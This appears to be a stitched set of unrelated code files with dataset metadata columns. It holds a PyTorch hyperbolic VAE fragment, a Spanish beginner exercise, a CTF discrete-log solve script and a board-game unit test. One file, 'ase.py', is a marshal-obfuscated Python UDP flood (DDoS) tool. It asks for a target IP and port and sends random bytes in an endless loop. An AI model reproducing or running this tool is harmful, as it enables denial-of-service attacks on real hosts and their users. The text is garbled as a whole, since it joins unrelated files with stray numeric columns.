class DecBernouilliWrapper(nn.Module):
""" Wrapper for Bernoulli likelihood """
def __init__(self, dec):
super(DecBernouilliWrapper, self).__init__()
self.dec = dec
def forward(self, z):
mu, _ = self.dec.forward(z)
return torch.tensor(1.0).to(z.device), mu
################################################################################
#
# Hyperbolic VAE encoders/decoders
#
################################################################################
class EncLinearConv(nn.Module):
""" 3d convolutional encoder """
def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim, prior_iso, posterior=None, num_mixtures=None):
super(EncLinearConv, self).__init__()
self.manifold = manifold
self.data_size = data_size
self.posterior = posterior
self.num_mixtures = num_mixtures
modules = []
modules.append(nn.Conv3d(in_channels=1, out_channels=16, kernel_size=(5, 5, 5), padding=(2, 2, 2)))
modules.append(nn.ReLU())
modules.append(nn.Conv3d(in_channels=16, out_channels=32, kernel_size=(5, 5, 5), padding=(1, 1, 1)))
modules.append(nn.ReLU())
modules.append(nn.Conv3d(in_channels=32, out_channels=64, kernel_size=(5, 5, 5), padding=(1, 1, 1)))
modules.append(nn.ReLU())
modules.append(nn.Conv3d(in_channels=64, out_channels=128, kernel_size=(5, 5, 5)))
modules.append(nn.ReLU())
modules.append(nn.Flatten())
modules.append(nn.Sequential(nn.Linear(1024, hidden_dim), non_lin))
self.enc = nn.Sequential(*modules)
self.fc21 = nn.Linear(hidden_dim, manifold.coord_dim)
self.fc22 = nn.Linear(hidden_dim, manifold.coord_dim if not prior_iso else 1)
def forward(self, x):
e = self.enc(x)
mu = self.fc21(e) # flatten data
return mu, F.softplus(self.fc22(e)) + Constants.eta, self.manifold #, self.posterior, self.num_mixtures
class DecLinearConv(nn.Module):
""" 3d convolutional decoder """
def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim):
super(DecLinearConv, self).__init__()
self.data_size = data_size
self.lin = nn.Sequential(nn.Linear(manifold.coord_dim, 8), non_lin) # hidden_dim
modules = []
modules.append(nn.ConvTranspose3d(in_channels=1, out_channels=64, kernel_size=(5, 5, 5), padding=(2, 2, 2)))
modules.append(nn.ReLU())
modules.append(nn.ConvTranspose3d(in_channels=64, out_channels=32, kernel_size=(5, 5, 5), padding=(1, 1, 1)))
modules.append(nn.ReLU())
modules.append(nn.ConvTranspose3d(in_channels=32, out_channels=16, kernel_size=(5, 5, 5), padding=(1, 1, 1)))
modules.append(nn.ReLU())
self.dec = nn.Sequential(*modules)
dim_modules = []
dim_modules.append(nn.ConvTranspose3d(in_channels=1, out_channels=1, kernel_size=(1, 1, 1), padding=(0, 0, 0)))
dim_modules.append(nn.ReLU())
self.dim_reduction = nn.Sequential(*dim_modules)
fc_modules = []
fc_modules.append(nn.ConvTranspose3d(in_channels=16, out_channels=1, kernel_size=(5, 5, 5)))
fc_modules.append(nn.ReLU())
self.fc31 = nn.Sequential(*fc_modules)
def forward(self, z):
l = self.lin(z)
v = l.view(-1, 1, 2, 2, 2)
r = self.dim_reduction(v)
d = self.dec(r)
mu = self.fc31(d).view(*z.size()[:-1], *self.data_size) # reshape data
return mu, torch.ones_like(mu)
class EncWrappedConv(nn.Module):
""" 3D convolutional encoder followed by an exponential map """
def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim, prior_iso, posterior=None, num_mixtures=None):
super(EncWrappedConv, self).__init__()
self.manifold = manifold
self.data_size = data_size
self.posterior = posterior
self.num_mixtures = num_mixtures
modules = []
modules.append(nn.Conv3d(in_channels=1, out_channels=16, kernel_size=(5, 5, 5), padding=(2, 2, 2)))
modules.append(nn.ReLU())
modules.append(nn.Conv3d(in_channels=16, out_channels=32, kernel_size=(5, 5, 5), padding=(1, 1, 1)))
modules.append(nn.ReLU())
modules.append(nn.Conv3d(in_channels=32, out_channels=64, kernel_size=(5, 5, 5), padding=(1, 1, 1)))
modules.append(nn.ReLU())
modules.append(nn.Conv3d(in_channels=64, out_channels=128, kernel_size=(5, 5, 5)))
modules.append(nn.ReLU())
modules.append(nn.Flatten())
modules.append(nn.Sequential(nn.Linear(1024, hidden_dim), non_lin))
self.enc = nn.Sequential(*modules)
self.fc21 = nn.Linear(hidden_dim, manifold.coord_dim)
self.fc22 = nn.Linear(hidden_dim, manifold.coord_dim if not prior_iso else 1)
def forward(self, x):
e = self.enc(x)
mu = self.fc21(e) # flatten data
mu = self.manifold.expmap0(mu)
return mu, F.softplus(self.fc22(e)) + Constants.eta, self.manifold #, self.posterior, self.num_mixtures
class DecWrappedConv(nn.Module):
""" 3d convolutional decoder preceded by a logarithm map """
def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim):
super(DecWrappedConv, self).__init__()
self.data_size = data_size
self.manifold = manifold
self.lin = nn.Sequential(nn.Linear(manifold.coord_dim, 8), non_lin) # hidden_dim
modules = []
modules.append(nn.ConvTranspose3d(in_channels=1, out_channels=64, kernel_size=(5, 5, 5), padding=(2, 2, 2)))
modules.append(nn.ReLU())
modules.append(nn.ConvTranspose3d(in_channels=64, out_channels=32, kernel_size=(5, 5, 5), padding=(1, 1, 1)))
modules.append(nn.ReLU())
modules.append(nn.ConvTranspose3d(in_channels=32, out_channels=16, kernel_size=(5, 5, 5), padding=(1, 1, 1)))
modules.append(nn.ReLU())
self.dec = nn.Sequential(*modules)
dim_modules = []
dim_modules.append(nn.ConvTranspose3d(in_channels=1, out_channels=1, kernel_size=(1, 1, 1), padding=(0, 0, 0)))
dim_modules.append(nn.ReLU())
self.dim_reduction = nn.Sequential(*dim_modules)
fc_modules = []
fc_modules.append(nn.ConvTranspose3d(in_channels=16, out_channels=1, kernel_size=(5, 5, 5)))
fc_modules.append(nn.ReLU())
self.fc31 = nn.Sequential(*fc_modules)
def forward(self, z):
z = self.manifold.logmap0(z)
l = self.lin(z)
v = l.view(-1, 1, 2, 2, 2)
r = self.dim_reduction(v)
d = self.dec(r)
mu = self.fc31(d).view(*z.size()[:-1], *self.data_size) # reshape data
return mu, torch.ones_like(mu)
class DecGyroConv(nn.Module):
""" 3d convolutional decoder preceded by a logarithm map """
def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim):
super(DecGyroConv, self).__init__()
self.data_size = data_size
self.manifold = manifold
self.hidden_dim = hidden_dim
gyro_modules = []
gyro_modules.append(GyroplaneConvLayer(in_features=manifold.coord_dim, out_channels=hidden_dim, kernel_size=1, manifold=manifold))
gyro_modules.append(nn.ReLU())
self.gyro_conv = nn.Sequential(*gyro_modules)
dim_modules = []
dim_modules.append(nn.ConvTranspose3d(in_channels=300, out_channels=1, kernel_size=(1, 1, 1), padding=(0, 0, 0)))
dim_modules.append(nn.ReLU())
self.dim_reduction = nn.Sequential(*dim_modules)
modules = []
modules.append(nn.ConvTranspose3d(in_channels=1, out_channels=64, kernel_size=(5, 5, 5), padding=(2, 2, 2)))
modules.append(nn.ReLU())
modules.append(nn.ConvTranspose3d(in_channels=64, out_channels=32, kernel_size=(5, 5, 5), padding=(1, 1, 1)))
modules.append(nn.ReLU())
modules.append(nn.ConvTranspose3d(in_channels=32, out_channels=16, kernel_size=(5, 5, 5), padding=(1, 1, 1)))
modules.append(nn.ReLU())
self.dec = nn.Sequential(*modules)
fc_modules = []
fc_modules.append(nn.ConvTranspose3d(in_channels=16, out_channels=1, kernel_size=(5, 5, 5)))
fc_modules.append(nn.ReLU())
self.fc31 = nn.Sequential(*fc_modules)
def forward(self, z):
batch = z.shape[1]
g = self.gyro_conv(z)
v = self.dim_reduction(g)
d = self.dec(v)
mu = self.fc31(d).view(-1, batch, *self.data_size) # reshape data
return mu, torch.ones_like(mu)
| 45.396341
| 138
| 0.639154
| 2,057
| 14,890
| 4.406903
| 0.070977
| 0.084611
| 0.095974
| 0.050303
| 0.878213
| 0.861666
| 0.850634
| 0.847215
| 0.844126
| 0.839713
| 0
| 0.030178
| 0.216655
| 14,890
| 328
| 139
| 45.396341
| 0.746999
| 0.053794
| 0
| 0.79845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.104651
| false
| 0
| 0.023256
| 0.003876
| 0.232558
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7a221d0a621296724c129a11629e14ae82a18639
| 4,426
|
py
|
Python
|
ase.py
|
gillanggans7/DdosXerXez7
|
e49054c8f3d49f6d869f3df94aac7ee4dfecd79d
|
[
"Apache-2.0"
] | null | null | null |
ase.py
|
gillanggans7/DdosXerXez7
|
e49054c8f3d49f6d869f3df94aac7ee4dfecd79d
|
[
"Apache-2.0"
] | null | null | null |
ase.py
|
gillanggans7/DdosXerXez7
|
e49054c8f3d49f6d869f3df94aac7ee4dfecd79d
|
[
"Apache-2.0"
] | 1
|
2019-05-07T11:47:28.000Z
|
2019-05-07T11:47:28.000Z
|
#Compiled InYoyurXerXez7
#2e4hTeam
#Kiya
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s0\x02\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x03\x00\x01d\x03\x00Z\x04\x00d\x04\x00Z\x05\x00d\x05\x00Z\x06\x00d\x06\x00Z\x07\x00d\x07\x00Z\x08\x00d\x08\x00Z\t\x00d\t\x00Z\n\x00d\n\x00Z\x0b\x00d\x0b\x00Z\x0c\x00d\x0c\x00Z\r\x00d\r\x00Z\x0e\x00d\x0e\x00Z\x0f\x00d\x08\x00Z\x10\x00d\x0f\x00Z\x11\x00d\x10\x00Z\x12\x00d\x11\x00Z\x13\x00d\x12\x00Z\x14\x00d\x13\x00Z\x15\x00d\x14\x00Z\x16\x00d\x15\x00Z\x17\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x18\x00Z\x18\x00d\x00\x00d\x01\x00l\x19\x00Z\x19\x00d\x00\x00d\x16\x00l\x1a\x00m\x1a\x00Z\x1a\x00\x01e\x1a\x00j\x1b\x00\x83\x00\x00Z\x1b\x00e\x1b\x00j\x1c\x00Z\x1c\x00e\x1b\x00j\x1d\x00Z\x1d\x00e\x1b\x00j\x1e\x00Z\x1e\x00e\x1b\x00j\x1f\x00Z\x1f\x00e\x1b\x00j \x00Z \x00e\x18\x00j\x18\x00e\x18\x00j!\x00e\x18\x00j"\x00\x83\x02\x00Z#\x00e\x19\x00j$\x00d\x17\x00\x83\x01\x00Z%\x00e\x00\x00j&\x00d\x18\x00\x83\x01\x00\x01e\x00\x00j&\x00d\x19\x00\x83\x01\x00\x01d\x1a\x00GHd\x1b\x00GHd\x1c\x00GHd\x1d\x00GHd\x1e\x00GHd\x1f\x00GHd\x1a\x00GHHe\'\x00d \x00\x83\x01\x00Z(\x00e)\x00d!\x00\x83\x01\x00Z*\x00e\x00\x00j&\x00d\x18\x00\x83\x01\x00\x01e\x00\x00j&\x00d"\x00\x83\x01\x00\x01d#\x00Z+\x00x[\x00e,\x00r+\x02e#\x00j-\x00e%\x00e(\x00e*\x00f\x02\x00\x83\x02\x00\x01e+\x00d$\x00\x17Z+\x00e*\x00d#\x00\x17Z*\x00d%\x00e+\x00e(\x00e*\x00f\x03\x00\x16GHe*\x00d&\x00k\x02\x00r\xd1\x01d#\x00Z*\x00q\xd1\x01q\xd1\x01Wd\x01\x00S(\'\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00sleeps\x07\x00\x00\x00\x1b[32;1ms\x07\x00\x00\x00\x1b[0;32ms\x07\x00\x00\x00\x1b[34;1ms\x07\x00\x00\x00\x1b[36;1ms\x07\x00\x00\x00\x1b[31;1ms\x04\x00\x00\x00\x1b[0ms\x07\x00\x00\x00\x1b[37;1ms\x07\x00\x00\x00\x1b[35;1ms\x06\x00\x00\x00\x1b[3;1ms\x07\x00\x00\x00\x1b[33;1ms\x07\x00\x00\x00\x1b[0;33ms\x07\x00\x00\x00\x1b[30;1ms\x05\x00\x00\x00\x1b[31ms\x07\x00\x00\x00\x1b[1;32ms\x05\x00\x00\x00\x1b[33ms\x05\x00\x00\x00\x1b[34ms\x05\x00\x00\x00\x1b[35ms\x05\x00\x00\x00\x1b[36ms\x05\x00\x00\x00\x1b[37m(\x01\x00\x00\x00t\x08\x00\x00\x00datetimei\xd2\x05\x00\x00t\x05\x00\x00\x00clears\x14\x00\x00\x00figlet XerXez|lolcats#\x00\x00\x00(:)~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(:)s#\x00\x00\x00|Nick : InYour XerXez7 :|s#\x00\x00\x00|Sosmed : @Oficial_XerXez7 :|s#\x00\x00\x00|ThankTo : Friends && Allah SwT :|s#\x00\x00\x00| : :|s#\x00\x00\x00|Team : 2e4h~Buft :|s\x1c\x00\x00\x00\x1b[34;1mMasukkan IP Target : s\x1c\x00\x00\x00\x1b[34;1mMasukkan Port : s\x12\x00\x00\x00figlet Play|lolcati\x00\x00\x00\x00i\x01\x00\x00\x00s"\x00\x00\x00=> %s packet => %s MengirimDdos:%si\xfe\xff\x00\x00(.\x00\x00\x00t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00timeR\x00\x00\x00\x00t\x01\x00\x00\x00gt\x02\x00\x00\x00gtt\x02\x00\x00\x00btt\x01\x00\x00\x00bt\x01\x00\x00\x00mt\x01\x00\x00\x00ct\x01\x00\x00\x00pt\x01\x00\x00\x00ut\x01\x00\x00\x00Mt\x01\x00\x00\x00kt\x02\x00\x00\x00ktt\x01\x00\x00\x00at\x01\x00\x00\x00Wt\x01\x00\x00\x00Rt\x01\x00\x00\x00Gt\x01\x00\x00\x00Ot\x01\x00\x00\x00Bt\x01\x00\x00\x00Pt\x01\x00\x00\x00Ct\x02\x00\x00\x00GRt\x06\x00\x00\x00sockett\x06\x00\x00\x00randomR\x01\x00\x00\x00t\x03\x00\x00\x00nowt\x04\x00\x00\x00hourt\x06\x00\x00\x00minutet\x03\x00\x00\x00dayt\x05\x00\x00\x00montht\x04\x00\x00\x00yeart\x07\x00\x00\x00AF_INETt\n\x00\x00\x00SOCK_DGRAMt\x04\x00\x00\x00sockt\x08\x00\x00\x00_urandomt\x05\x00\x00\x00bytest\x06\x00\x00\x00systemt\t\x00\x00\x00raw_inputt\x02\x00\x00\x00ipt\x05\x00\x00\x00inputt\x04\x00\x00\x00portt\x04\x00\x00\x00sentt\x04\x00\x00\x00Truet\x06\x00\x00\x00sendto(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<debby>t\x08\x00\x00\x00<module>\x04\x00\x00\x00sv\x00\x00\x00\x0c\x01\x0c\x01\x0c\x01\x10\x02\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x02\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x02\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x02\x10\x01\x0c\x01\t\x01\t\x01\t\x01\t\x01\t\x02\x18\x01\x0f\x02\r\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x01\x01\x0c\x01\x0c\x02\r\x01\r\x01\x06\x01\t\x01\x16\x01\n\x01\n\x01\x12\x01\x0c\x01'))
| 737.666667
| 4,369
| 0.741301
| 944
| 4,426
| 3.470339
| 0.173729
| 0.267399
| 0.148352
| 0.076923
| 0.392857
| 0.289377
| 0.253358
| 0.185287
| 0.154762
| 0.154762
| 0
| 0.383048
| 0.024401
| 4,426
| 5
| 4,370
| 885.2
| 0.375637
| 0.007908
| 0
| 0
| 0
| 1
| 0.604376
| 0.560848
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
7a5874d6c182281450672b2b31fd35bdb010a7eb
| 818
|
py
|
Python
|
exercises/18_sinbucles.py
|
ChromeOwO/Curso-B-sico-de-Python-Platzi
|
d97d99f25b22d3ec2f4bcadbe4f53c87d3077587
|
[
"MIT"
] | 3
|
2021-05-29T23:30:56.000Z
|
2021-06-05T15:16:11.000Z
|
exercises/18_sinbucles.py
|
ChromeOwO/Curso-Basico-de-Python-Platzi
|
d97d99f25b22d3ec2f4bcadbe4f53c87d3077587
|
[
"MIT"
] | null | null | null |
exercises/18_sinbucles.py
|
ChromeOwO/Curso-Basico-de-Python-Platzi
|
d97d99f25b22d3ec2f4bcadbe4f53c87d3077587
|
[
"MIT"
] | 3
|
2021-07-21T20:03:16.000Z
|
2021-07-23T15:04:19.000Z
|
contador = 0
print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador))
contador = 1
print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador))
contador = 2
print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador))
contador = 3
print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador))
contador = 4
print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador))
contador = 5
print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador))
contador = 6
print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador))
contador = 7
print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador))
contador = 8
print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador))
| 30.296296
| 76
| 0.594132
| 126
| 818
| 3.857143
| 0.126984
| 0.148148
| 0.240741
| 0.259259
| 0.965021
| 0.965021
| 0.965021
| 0.965021
| 0.965021
| 0.965021
| 0
| 0.042254
| 0.218826
| 818
| 26
| 77
| 31.461538
| 0.71831
| 0
| 0
| 0.5
| 0
| 0
| 0.275061
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
8f8d0d6c3d4a815e150314a56d2ce7c420a0c208
| 766
|
py
|
Python
|
2021/bsidesahmedabad/dlppp/dlppp/solve.py
|
HaroldHH/My-CTF-Solutions
|
7baca0df1ca96a00de77a1a113a0011c43ad6ab8
|
[
"MIT"
] | null | null | null |
2021/bsidesahmedabad/dlppp/dlppp/solve.py
|
HaroldHH/My-CTF-Solutions
|
7baca0df1ca96a00de77a1a113a0011c43ad6ab8
|
[
"MIT"
] | null | null | null |
2021/bsidesahmedabad/dlppp/dlppp/solve.py
|
HaroldHH/My-CTF-Solutions
|
7baca0df1ca96a00de77a1a113a0011c43ad6ab8
|
[
"MIT"
] | null | null | null |
from math import ceil, sqrt
from Crypto.Util.number import long_to_bytes
# Reference : https://bomotodo.wordpress.com/2017/04/09/asis-quals-2017-dlp-158-points/
p = 0xa1c8e1e9b2301cb1f5d424ec6d959d7f275e11507b2177d55f3dc1268c9a3164b72832f362975023f09623814f80fe0ffad179d0e51c40b8a1f882d1f5f28e71
y = 0x6fa0fcc8c9c5f695a5709243698d7640c27c45352375919d538137333ab3a2c748cae5e7c1294d6ffc4007476f6fec6421c992f9fe1919b381306300caa2260953e48f2ec0de7b8c6417faa42001a748b1b367f5211095ddd6bf4e681f7e7ad787e0a7f562f6f0307d6a8d7e8d18cd59bd7572f0c4f430f0fd4fc61503b203f3bcd6dd0b0f84bbdbd42126d95b525fe77e4be62c6dbd083dbcaa284b20a9ea6faf9cbaf20dd88b0180417c9021fa1dcb52b2348c4376bd6b9b38a6c860086af
flag = ((y % (p**2)) - 1)//p
print("[+] Flag : " + str(long_to_bytes(flag)))
| 69.636364
| 389
| 0.891645
| 44
| 766
| 15.431818
| 0.75
| 0.017673
| 0.032401
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.46922
| 0.045692
| 766
| 10
| 390
| 76.6
| 0.459644
| 0.110966
| 0
| 0
| 0
| 0
| 0.0162
| 0
| 0
| 1
| 0.758468
| 0.1
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0.166667
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
8907c4e3355ea5e8cb189f280fbb26162a96c422
| 10,337
|
py
|
Python
|
z2/part2/interactive/jm/random_normal_1/151224417.py
|
kozakusek/ipp-2020-testy
|
09aa008fa53d159672cc7cbf969a6b237e15a7b8
|
[
"MIT"
] | 1
|
2020-04-16T12:13:47.000Z
|
2020-04-16T12:13:47.000Z
|
z2/part2/interactive/jm/random_normal_1/151224417.py
|
kozakusek/ipp-2020-testy
|
09aa008fa53d159672cc7cbf969a6b237e15a7b8
|
[
"MIT"
] | 18
|
2020-03-06T17:50:15.000Z
|
2020-05-19T14:58:30.000Z
|
z2/part2/interactive/jm/random_normal_1/151224417.py
|
kozakusek/ipp-2020-testy
|
09aa008fa53d159672cc7cbf969a6b237e15a7b8
|
[
"MIT"
] | 18
|
2020-03-06T17:45:13.000Z
|
2020-06-09T19:18:31.000Z
|
from part1 import (
gamma_board,
gamma_busy_fields,
gamma_delete,
gamma_free_fields,
gamma_golden_move,
gamma_golden_possible,
gamma_move,
gamma_new,
)
"""
scenario: test_random_actions
uuid: 151224417
"""
"""
random actions, total chaos
"""
board = gamma_new(8, 8, 6, 5)
assert board is not None
assert gamma_move(board, 1, 5, 7) == 1
assert gamma_move(board, 1, 5, 7) == 0
assert gamma_move(board, 2, 1, 5) == 1
assert gamma_move(board, 3, 0, 4) == 1
assert gamma_busy_fields(board, 3) == 1
assert gamma_move(board, 4, 5, 7) == 0
assert gamma_move(board, 4, 1, 0) == 1
assert gamma_busy_fields(board, 4) == 1
assert gamma_move(board, 5, 4, 7) == 1
assert gamma_move(board, 6, 7, 0) == 1
assert gamma_move(board, 1, 0, 5) == 1
assert gamma_busy_fields(board, 1) == 2
assert gamma_move(board, 2, 4, 6) == 1
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 3, 1, 4) == 1
assert gamma_move(board, 4, 0, 0) == 1
board539143392 = gamma_board(board)
assert board539143392 is not None
assert board539143392 == ("....51..\n"
"....2...\n"
"12......\n"
"33......\n"
"........\n"
"........\n"
"........\n"
"44.....6\n")
del board539143392
board539143392 = None
assert gamma_move(board, 5, 1, 0) == 0
assert gamma_move(board, 6, 0, 4) == 0
assert gamma_move(board, 1, 0, 3) == 1
assert gamma_move(board, 1, 5, 1) == 1
board965567065 = gamma_board(board)
assert board965567065 is not None
assert board965567065 == ("....51..\n"
"....2...\n"
"12......\n"
"33......\n"
"1.......\n"
"........\n"
".....1..\n"
"44.....6\n")
del board965567065
board965567065 = None
assert gamma_move(board, 2, 2, 1) == 1
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 3, 7, 2) == 1
assert gamma_free_fields(board, 3) == 50
assert gamma_move(board, 4, 6, 3) == 1
assert gamma_move(board, 4, 7, 4) == 1
assert gamma_move(board, 5, 5, 1) == 0
assert gamma_move(board, 5, 6, 1) == 1
assert gamma_move(board, 6, 3, 7) == 1
assert gamma_move(board, 1, 2, 0) == 1
assert gamma_move(board, 1, 7, 0) == 0
assert gamma_move(board, 2, 2, 7) == 1
board809363724 = gamma_board(board)
assert board809363724 is not None
assert board809363724 == ("..2651..\n"
"....2...\n"
"12......\n"
"33.....4\n"
"1.....4.\n"
".......3\n"
"..2..15.\n"
"441....6\n")
del board809363724
board809363724 = None
assert gamma_move(board, 3, 4, 3) == 1
assert gamma_move(board, 4, 0, 0) == 0
assert gamma_move(board, 5, 6, 0) == 1
assert gamma_free_fields(board, 5) == 42
board825369756 = gamma_board(board)
assert board825369756 is not None
assert board825369756 == ("..2651..\n"
"....2...\n"
"12......\n"
"33.....4\n"
"1...3.4.\n"
".......3\n"
"..2..15.\n"
"441...56\n")
del board825369756
board825369756 = None
assert gamma_move(board, 6, 2, 4) == 1
assert gamma_move(board, 6, 2, 7) == 0
assert gamma_move(board, 1, 2, 5) == 0
assert gamma_move(board, 1, 3, 6) == 0
assert gamma_move(board, 2, 5, 7) == 0
assert gamma_move(board, 2, 1, 2) == 1
assert gamma_move(board, 3, 3, 5) == 1
assert gamma_move(board, 4, 0, 4) == 0
assert gamma_move(board, 5, 7, 0) == 0
assert gamma_move(board, 5, 3, 3) == 1
assert gamma_move(board, 6, 4, 5) == 1
assert gamma_move(board, 1, 3, 2) == 0
assert gamma_move(board, 2, 1, 4) == 0
assert gamma_move(board, 3, 1, 1) == 1
assert gamma_move(board, 4, 2, 6) == 1
assert gamma_move(board, 4, 5, 5) == 1
assert gamma_move(board, 5, 0, 4) == 0
assert gamma_move(board, 6, 5, 2) == 1
assert gamma_move(board, 6, 4, 4) == 1
board847746538 = gamma_board(board)
assert board847746538 is not None
assert board847746538 == ("..2651..\n"
"..4.2...\n"
"12.364..\n"
"336.6..4\n"
"1..53.4.\n"
".2...6.3\n"
".32..15.\n"
"441...56\n")
del board847746538
board847746538 = None
assert gamma_move(board, 1, 4, 2) == 0
assert gamma_move(board, 1, 5, 0) == 1
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_move(board, 2, 3, 0) == 0
assert gamma_golden_move(board, 2, 7, 4) == 0
assert gamma_move(board, 3, 3, 5) == 0
assert gamma_move(board, 4, 0, 4) == 0
assert gamma_free_fields(board, 4) == 12
assert gamma_move(board, 5, 6, 2) == 1
assert gamma_free_fields(board, 5) == 30
assert gamma_move(board, 6, 6, 5) == 0
assert gamma_golden_possible(board, 6) == 1
assert gamma_move(board, 1, 6, 7) == 1
assert gamma_free_fields(board, 1) == 9
assert gamma_move(board, 2, 5, 7) == 0
assert gamma_move(board, 2, 2, 3) == 0
assert gamma_move(board, 3, 7, 3) == 1
assert gamma_move(board, 4, 6, 3) == 0
assert gamma_move(board, 5, 1, 0) == 0
assert gamma_move(board, 5, 7, 1) == 1
assert gamma_move(board, 1, 2, 4) == 0
assert gamma_move(board, 1, 6, 1) == 0
assert gamma_free_fields(board, 1) == 9
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 3, 2, 5) == 1
assert gamma_move(board, 4, 2, 2) == 0
assert gamma_move(board, 4, 2, 3) == 0
assert gamma_move(board, 5, 0, 4) == 0
assert gamma_move(board, 5, 7, 1) == 0
assert gamma_free_fields(board, 5) == 26
assert gamma_move(board, 6, 1, 4) == 0
assert gamma_move(board, 6, 7, 1) == 0
assert gamma_busy_fields(board, 6) == 6
assert gamma_move(board, 1, 2, 4) == 0
assert gamma_move(board, 2, 3, 5) == 0
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 3, 6, 5) == 0
assert gamma_move(board, 4, 2, 3) == 0
assert gamma_move(board, 5, 6, 0) == 0
assert gamma_move(board, 5, 5, 0) == 0
assert gamma_move(board, 6, 2, 3) == 1
assert gamma_move(board, 6, 2, 5) == 0
assert gamma_golden_possible(board, 6) == 1
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 2, 0, 3) == 0
assert gamma_golden_move(board, 2, 3, 0) == 0
assert gamma_move(board, 3, 6, 4) == 0
assert gamma_move(board, 4, 5, 7) == 0
assert gamma_free_fields(board, 4) == 9
assert gamma_move(board, 5, 0, 2) == 1
assert gamma_move(board, 5, 3, 7) == 0
assert gamma_busy_fields(board, 5) == 7
assert gamma_move(board, 6, 5, 6) == 0
assert gamma_move(board, 6, 2, 7) == 0
assert gamma_move(board, 1, 1, 2) == 0
assert gamma_move(board, 2, 2, 3) == 0
assert gamma_move(board, 3, 7, 7) == 0
assert gamma_move(board, 4, 7, 1) == 0
assert gamma_move(board, 5, 1, 0) == 0
assert gamma_move(board, 6, 1, 0) == 0
assert gamma_move(board, 6, 0, 6) == 0
board308154158 = gamma_board(board)
assert board308154158 is not None
assert board308154158 == ("..26511.\n"
"..4.2...\n"
"123364..\n"
"336.6..4\n"
"1.653.43\n"
"52...653\n"
".32..155\n"
"441..156\n")
del board308154158
board308154158 = None
assert gamma_move(board, 1, 4, 3) == 0
assert gamma_move(board, 1, 4, 0) == 1
assert gamma_move(board, 2, 6, 0) == 0
assert gamma_move(board, 2, 1, 4) == 0
assert gamma_move(board, 3, 4, 5) == 0
assert gamma_move(board, 4, 0, 4) == 0
assert gamma_move(board, 5, 2, 4) == 0
assert gamma_move(board, 5, 4, 3) == 0
assert gamma_move(board, 6, 6, 7) == 0
assert gamma_move(board, 1, 2, 5) == 0
assert gamma_move(board, 1, 5, 2) == 0
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 6, 0) == 0
assert gamma_move(board, 2, 5, 5) == 0
assert gamma_free_fields(board, 2) == 7
assert gamma_move(board, 3, 1, 0) == 0
